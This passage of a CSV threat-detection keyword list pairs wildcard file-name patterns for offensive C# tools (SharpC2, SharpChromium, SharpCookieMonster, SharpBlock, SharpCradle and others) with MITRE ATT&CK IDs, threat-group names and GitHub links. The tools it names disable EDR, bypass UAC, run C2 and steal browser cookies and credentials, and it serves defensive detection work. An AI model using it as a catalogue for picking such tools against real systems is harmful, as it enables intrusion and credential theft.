Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" +"*SharpBlackOut.sln*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" +"*SharpBlackout-main*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" +"*SharpBlock -*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" +"*SharpBlock.csproj*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" +"*SharpBlock.exe*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" +"*SharpBlock.sln*","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","10","10","975","147","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" +"*SharpBypassUAC*","offensive_tool_keyword","AD exploitation cheat sheet","Use SharpBypassUAC e.g. from a CobaltStrike beacon","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*SharpBypassUAC.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpC2 *","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*SharpC2*.cs*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*SharpC2*.exe*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*sharpc2*client-windows.zip*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*SharpC2.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*SharpC2.API*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*SharpC2Event*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*SharpC2Hub*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*SharpC2Webhook*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*SharpCalendar.exe*","offensive_tool_keyword","cobaltstrike",".NET Assembly to Retrieve Outlook Calendar Details","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCalendar","1","1","N/A","10","10","13","1","2021-10-07T19:42:20Z","2021-10-07T17:11:46Z" +"*SharpCat.exe*","offensive_tool_keyword","cobaltstrike","C# alternative to the linux cat command... Prints file contents to console. For use with Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCat","1","1","N/A","10","10","16","5","2021-07-15T15:01:02Z","2021-07-15T14:57:53Z" +"*SharpChisel.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpChrome backupkey*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpChrome.cs*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpChrome.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*sharpchromium *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpChromium.csproj*","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","608","98","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" +"*SharpChromium.exe*","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","608","98","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" +"*SharpChromium.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpChromium.sln*","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","608","98","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" +"*SharpChromium-master*","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","608","98","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" +"*SharpClipHistory*","offensive_tool_keyword","SharpClipHistory","SharpClipHistory is a .NET 4.5 application written in C# that can be used to read the contents of a users clipboard history in Windows 10 starting from the 1809 Build.","T1115 - T1113 - T1015 - T1053 - T1059","TA0003 - TA0007","N/A","N/A","Information Gathering","https://github.com/FSecureLABS/SharpClipHistory","1","1","N/A","N/A","2","179","36","2020-01-23T13:39:13Z","2019-04-25T22:17:08Z" +"*sharpcloud.cna*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" +"*SharpCloud.csproj*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" +"*SharpCloud.exe*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" +"*SharpCloud.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpCloud.sln*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" +"*SharpCloud-master*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" +"*SharpCOM.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpCOMManager.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*sharpcompile*.exe*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" +"*sharpCompileHandler*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" +"*SharpCompileServer*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" +"*SharpCompileServer.exe*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" +"*SharpConfigParser.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*sharpcookiemonster*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpCookieMonster*WebSocket4Net.dll*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" +"*SharpCookieMonster.csproj*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" +"*SharpCookieMonster.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpCookieMonster.exe*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" +"*SharpCookieMonster.sln*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" +"*SharpCookieMonsterOriginal.exe*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" +"*SharpCradle*logonpasswords*","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 